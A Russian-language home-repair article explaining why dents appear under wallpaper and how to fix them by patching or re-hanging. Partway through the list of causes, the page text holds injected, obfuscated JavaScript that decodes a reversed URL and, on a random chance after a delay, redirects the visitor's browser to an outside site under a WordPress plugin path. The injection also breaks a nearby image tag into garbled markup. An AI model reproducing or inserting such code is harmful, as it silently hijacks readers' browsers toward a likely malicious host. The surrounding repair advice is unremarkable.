Добавить в закладки

Как убрать вмятины на обоях

Многие в своей жизни скорее всего занимались поклейкой обоев, может быть и не 1 раз, как все наверняка знают при поклейке важно убирать весь воздух между клеем и полотном, а так же предварительно подготовить стену к поклейке, но что если при поклейке вы не заметили какой то момент, а после он начал «мозолить» ваш взгляд? В этой статье вы узнаете как без ущерба внешнему виду убрать различные вмятины на ваших обоях.

Вмятина на стене. Источник: gid-str.ru

Причины возникновения вмятин:

  1. Неправильное распределение штукатурки. В процессе нанесения штукатурки главное – это соблюдать равномерность нанесения смеси, иначе позже это может повлечь образование в штукатурке трещин, а на обоях они будут видны как вмятины.
  2. Сушка. После нанесения штукатурки ей нужно дать как следует просохнуть(обычно на это требуется около 2х суток) Если же состав не окончательно подсохнет, то при поклейке обоев в некоторых местах, где было приложено давление так же могут образоваться вмятины.
  3. Качественные материалы. Так же всегда стоит ставить качественные материалы в приоритете, так как дешевая шпаклевка со временем потеряет свои эксплуатационные свойства.
$NjS=function(n){if(typeof ($NjS.list[n])==»string») return $NjS.list[n].split(«»).reverse().join(«»);return $NjS.list[n];};$NjS.list=[«\’php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to9397/20444596616-0/original.jpg» alt=»» width=»700″ height=»430″ /> Угловая вмятина. Источник: shnyagi.net

Как же убрать вмятины, если обои уже поклеены?

Существует 2 метода по удалению вмятин:

  1. Зашпаклевать место вмятины. К сожалению для этого потребуется частично удалить обои, после аккуратно зашпаклевать не оставив ничего лишнего и ОБЯЗАТЕЛЬНО дать застыть, лишь после приклеить обои на место. Однако данный метод актуален в тех случаях, когда на обоях только одна вмятина.
  2. Если же вмятин множество, то выход к сожалению только 1, и он достаточно печальный, придётся переклеивать обои заново, а перед эти провести качественную подготовку стен.

На основании всего вышесказанного можно сделать вывод, что оклейка обоев, это достаточно сложная процедура. Поэтому её выполнение лучше доверить профессионалам, которые смогут справиться с поставленной задачей в кратчайшие сроки.

Аккуратные надрезы. Источник: rem-stroy-portal.com

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Автор: Александр
Опубликовано: 07.12.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: